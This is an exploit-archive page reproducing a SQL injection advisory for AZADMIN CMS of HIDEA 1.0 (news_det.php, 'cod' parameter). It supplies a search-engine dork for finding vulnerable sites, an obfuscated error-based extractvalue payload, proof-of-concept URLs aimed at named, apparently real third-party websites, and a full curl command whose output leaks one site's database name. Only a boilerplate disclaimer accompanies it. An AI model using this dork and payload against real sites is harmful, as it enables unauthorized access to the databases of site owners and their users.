AZADMIN CMS Of HIDEA 1.0 SQL Injection
CVE
Category
Price
Severity
N/A
CWE-89
N/A
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2019-06-28
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019060158 Below is a copy:
AZADMIN CMS Of HIDEA 1.0 SQL Injection [+] Sql Injection on AZADMIN CMS of HIDEA v1.0
[+] Date: 24/06/2019
[+] CWE Number : CWE-89
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: https://www.hidea.com/
[+] Contact: [email protected]
[+] Tested on: Windows 7 and Linux
[+] Vulnerable Files: news_det.php
[+] Dork : inurl:"news_det.php?cod=" HIDEA
[+] Exploit : https://www.site.com/news_det.php?cod=[SQL Injection]
[+] Payload : /*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
[+] PoC:
http://www.cardiopediatria.com.br/news_det.php?cod=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
https://www.dialsist.com.br/news_det.php?cod=77/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
[+] Example:
curl 'http://www.centroconcept.com.br/news_det.php?cod=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-' -H 'Host: www.centroconcept.com.br' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3' --compressed -H 'Cookie: PHPSESSID=dv0rd3b6rbghah80getonfp601' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1'
XPATH syntax error: '
s3x0u:centroco_ger:s3x0u'
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum